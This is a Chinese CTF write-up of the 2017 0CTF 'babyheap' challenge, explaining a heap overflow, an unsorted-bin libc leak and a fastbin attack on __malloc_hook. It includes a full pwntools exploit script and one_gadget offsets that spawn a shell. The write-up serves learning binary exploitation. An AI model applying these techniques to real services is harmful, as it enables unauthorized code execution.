fastbin attack + unsortedbin attack + __malloc_hook 的基础利用

题目下载 : https://uaf.io/assets/0ctfbabyheap

本题是2017 0ctf 很简单的一道题

先来看一下题目的基本信息
$ checksec babyheap

    Arch:     amd64-64-little

    RELRO:    Full RELRO

    Stack:    Canary found

    NX:       NX enabled

    PIE:      PIE enabled

$ ./babyheap

===== Baby Heap in 2017 =====

1. Allocate

2. Fill

3. Free

4. Dump

5. Exit

Command:

保护全开,是一个典型的菜单题,结合ida,先写下这几个函数

def alloc(size):

    p.recvuntil('Command: ')

    p.sendline('1')

    p.sendline(str(size))

def fill(idx,payload):

    p.recvuntil('Command: ')

    p.sendline('2')

    p.sendline(str(idx))

    p.sendline(str(len(payload)))

    p.send(payload) 

def free(idx):

    p.recvuntil('Command: ')

    p.sendline('3')

    p.sendline(str(idx))   

def dump(idx):

    p.recvuntil('Command: ')

    p.sendline('4')

    p.sendline(str(idx))

    p.recvuntil('Content: \n')

然后在ida中发现

__int64 __fastcall fill(__int64 a1)

{

  ...

  printf("Index: ");

  result = num();

  v2 = result;

  if ( (signed int)result >= 0 && (signed int)result <= 15 )

  {

    result = *(unsigned int *)(24LL * (signed int)result + a1);

    if ( (_DWORD)result == 1 )

    {

      printf("Size: ");

      result = num();

      v3 = result;

      if ( (signed int)result > 0 )

      {

        printf("Content: ");

 ====>  result = read____(*(_QWORD *)(24LL * v2 + a1 + 16), v3);

 ...

他并没有对输入的长度做判断,我们可以从一个堆块溢出到另一个堆块上

我们也可以对堆块的大小做控制

  1. 通过unsortedbin attack 来leak出堆的地址

    • 提前申请几个小堆块
    • 利用第一个chunk的溢出,修改第二个chunk的size(大到能包括每三个chunk的fd)
    • free第二个chunk,再申请回来
    • 利用这个chunk 改大第三个chunk (free能后进unsortedbin )
    • 通过第二个chunk读第三个chunk的fd(main_arena+88的地址)
  2. 通过 fastbin attack 控制 __malloc_hook
    • free 掉提前申请的0x60大小的chunk
    • 通过第一步的思路改被free的fd为 __malloc_hook
  3. 把__malloc_hook 改为
  4. 调用calloc 去执行 one_gadget
1. 通过unsortedbin attack 来leak出堆的地址
alloc(0x10)#idx0

alloc(0x10)#idx1

alloc(0x30)#idx2

alloc(0x40)#idx3

alloc(0x60)#idx4    

fill(0,p64(0x51)*4) #idx1 -> size =0x51

fill(2,p64(0x31)*6) #让被free的chunk检查到后面是在用的chunk

free(1)

alloc(0x40)#idx1 这个指针还是idx1的位置,但是可以读 idx2 ->fd 了

fill(1,p64(0x91)*4) #将idx2放进unsorted bin中

free(2)

dump(1)

p.recv(0x20)

SBaddr = u64(p.recv(8))

p.recvline()

malloc_hook=SBaddr-88-0x10

success('malloc_hook = '+hex(malloc_hook))

free(2)的时候我没有去控制 unsortedbin 会检查到下一个chunk 我把idx2->size改为0x91后,下一个chunk正好是idx4 ,上面申请的5个内存的大小是我精心构造的

完整exp如下:

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

from pwn import *

p = process("./babyheap")

elf=ELF('./babyheap')

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

#context.log_level='debug'

context.terminal = ["tmux","splitw","-h"]

context.arch = "amd64"

def alloc(size):

    p.recvuntil('Command: ')

    p.sendline('1')

    p.sendline(str(size))

def fill(idx,payload):

    p.recvuntil('Command: ')

    p.sendline('2')

    p.sendline(str(idx))

    p.sendline(str(len(payload)))

    p.send(payload) 

def free(idx):

    p.recvuntil('Command: ')

    p.sendline('3')

    p.sendline(str(idx))   

def dump(idx):

    p.recvuntil('Command: ')

    p.sendline('4')

    p.sendline(str(idx))

    p.recvuntil('Content: \n')    

#-------leak main_arena -  unsorted bin attack ------

alloc(0x10)#idx0

alloc(0x10)#idx1

alloc(0x30)#idx2

alloc(0x40)#idx3

alloc(0x60)#idx4    

fill(0,p64(0x51)*4) #idx1 -> size =0x51

fill(2,p64(0x31)*6) #让被free的chunk检查到后面是在用的chunk

free(1)

alloc(0x40)#idx1 这个指针还是idx1的位置,但是可以读写 idx2 ->fd 了

fill(1,p64(0x91)*4) #将idx2放进unsorted bin中

free(2)

dump(1)

p.recv(0x20)

SBaddr = u64(p.recv(8))

p.recvline()

malloc_hook=SBaddr-88-0x10

success('malloc_hook = '+hex(malloc_hook))

#------------ 把malloc_hook申请出来 ---------------------

free(4)

payload=p64(0)*9+p64(0x71)+p64(malloc_hook-0x23)

fill(3,payload)

alloc(0x60)#idx2

alloc(0x60)#idx4 malloc_hook

#----------- 改 malloc_hook ---------------------------

libc_addr = malloc_hook-libc.symbols['__malloc_hook']

success('libc = '+hex(libc_addr))

payload=p64(libc_addr+0x4526a) #0x4526a在下面解释

shllcode='a'*0x13+payload

fill(4,shllcode) 

alloc(1)

p.sendline('bash')

p.interactive()

我们需要在 __malloc_hook 写一个函数地址,用来getshell

0x4526a这个偏移里写的是这东西:

<do_system+1098>:     mov    rax,QWORD PTR [rip+0x37ec47]

<do_system+1105>:     lea    rdi,[rip+0x147adf]

<do_system+1112>:     lea    rsi,[rsp+0x30]

<do_system+1117>:     mov    DWORD PTR [rip+0x381219],0x0

<do_system+1127>:     mov    DWORD PTR [rip+0x381213],0x0

<do_system+1137>:     mov    rdx,QWORD PTR [rax]

<do_system+1140>:     call   0x7f7f36b27770 <execve>

这个位置是怎么找到的? 分享一个小工具: https://github.com/david942j/one_gadget.git

$ one_gadget /lib/x86_64-linux-gnu/libc-2.23.so

0x45216 execve("/bin/sh", rsp+0x30, environ)

constraints:

  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)

constraints:

  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)

constraints:

  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)

constraints:

  [rsp+0x70] == NULL

$

这4个地址一个一个的试去吧!骚年!

2017-0ctf-babyheap的更多相关文章

  1. Pwn with File结构体之利用 vtable 进行 ROP

    前言 本文以 0x00 CTF 2017 的 babyheap 为例介绍下通过修改 vtable 进行 rop 的操作 (:-_- 漏洞分析 首先查看一下程序开启的安全措施 18:07 haclh@u ...

  2. 0CTF 2017 部分Web的某些不一样的思路

    洒家参加了0CTF 2017,做了一些题目.赛后过了好几天,看网上已经有了一些写得不错的Writeup,这里就写一写洒家的一些不一样的思路. 一些不错的Writeup https://ctftime. ...

  3. 0ctf 2017 kernel pwn knote write up

    UAF due to using hlist_add_behind() without checking. There is a pair locker(mutex_lock) at delete_n ...

  4. CI Weekly #10 | 2017 DevOps 趋势预测

    2016 年的最后几个工作日,我们对 flow.ci Android & iOS 项目做了一些优化与修复: iOS 镜像 cocoapods 版本更新: fir iOS上传插件时间问题修复: ...

  5. 猖獗的假新闻:2017年1月1日起iOS的APP必须使用HTTPS

    一.假新闻如此猖獗 刚才一位老同事 打电话问:我们公司还是用的HTTP,马上就到2017年了,提交AppStore会被拒绝,怎么办? 公司里已经有很多人问过这个问题,回答一下: HTTP还是可以正常提 ...

  6. iOS的ATS配置 - 2017年前ATS规定的适配

    苹果规定 从2017年1月1日起,新提交的 app 不允许使用NSAllowsArbitraryLoads来绕过ATS(全称:App Transport Security)的限制. 以前为了能兼容ht ...

  7. 深入研究Visual studio 2017 RC新特性

    在[Xamarin+Prism开发详解三:Visual studio 2017 RC初体验]中分享了Visual studio 2017RC的大致情况,同时也发现大家对新的Visual Studio很 ...

  8. Xamarin+Prism开发详解三:Visual studio 2017 RC初体验

    Visual studio 2017 RC出来一段时间了,最近有时间就想安装试试,随带分享一下安装使用体验. 1,卸载visual studio 2015 虽然可以同时安装visual studio ...

  9. Microsoft Visual Studio 2017 for Mac Preview 下载+安装+案例Demo

    目录: 0. 前言 1. 在线安装器 2. 安装VS 3. HelloWorld 4. ASP.NET MVC 5. 软件下载 6. 结尾 0. 前言: 工作原因,上下班背着我的雷神,一个月瘦了10斤 ...

随机推荐

  1. Big Data(三)伪分布式和完全分布式的搭建

    关于伪分布式的配置全程 伪分布式图示 1.安装VMWare WorkStation,直接下一步,输入激活码即可安装 2.安装Linux(需要100GB) 引导分区Boot200MB 交换分区Swap2 ...

  2. 【BZOJ1999】树网的核

    题目大意:题目过长,无法简单描述... 题解: 由于树网的核一定是树直径的一段,因此考虑先将直径取出,通过两次 BFS 即可.要求的东西是树上任意一点到这条取出的线段的距离的最大值,发现这个最大值有可 ...

  3. ps雨滴效果制作

    雨滴效果制作 尽量选择比较暗或者有人打伞的照片,方便制作雨天的效果 新建图层,设置前景色为黑色,并填充新建的图层为黑色 选择滤镜->杂色->添加杂色,数量设置为150左右(设置得越大后面的 ...

  4. HDU-4185-Oil Skimming(最大匹配)

    链接: https://vjudge.net/problem/HDU-4185 题意: Thanks to a certain "green" resources company, ...

  5. 在vue组件中使用vuex的state状态对象的5种方式

    下面是store文件夹下的state.js和index.js内容 //state.js const state = { headerBgOpacity:0, loginStatus:0, count: ...

  6. [每日一讲] Python系列:字符串(下)

    字符串的常见操作 """ DATA STRUCTURE Container: Sequence -- String String is immutable.If stri ...

  7. Hibernate实体对象的生命周期(三种状态)

    瞬时状态(Transient) 通过new创建对象后,对象并没有立刻持久化,它并未与数据库中的数据有任何关联,此时Java对象的状态为瞬时状态. Session对于瞬时状态的Java对象是一无所知的, ...

  8. 访问SpringBoot中的Swagger的方法

    1.首先启动springboot+swagger的工程. 2.在application.yml里面查看服务的端口号,比如这里是9510. 3.访问URL:http://localhost:9510/t ...

  9. jdk java 环境变量配置

    下载 下载JDK 64 位 wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fw ...

  10. 【javascript】生成二维码

    1 <!DOCTYPE html> 2 <html> 3 <head> 4 <meta charset="UTF-8"> 5 < ...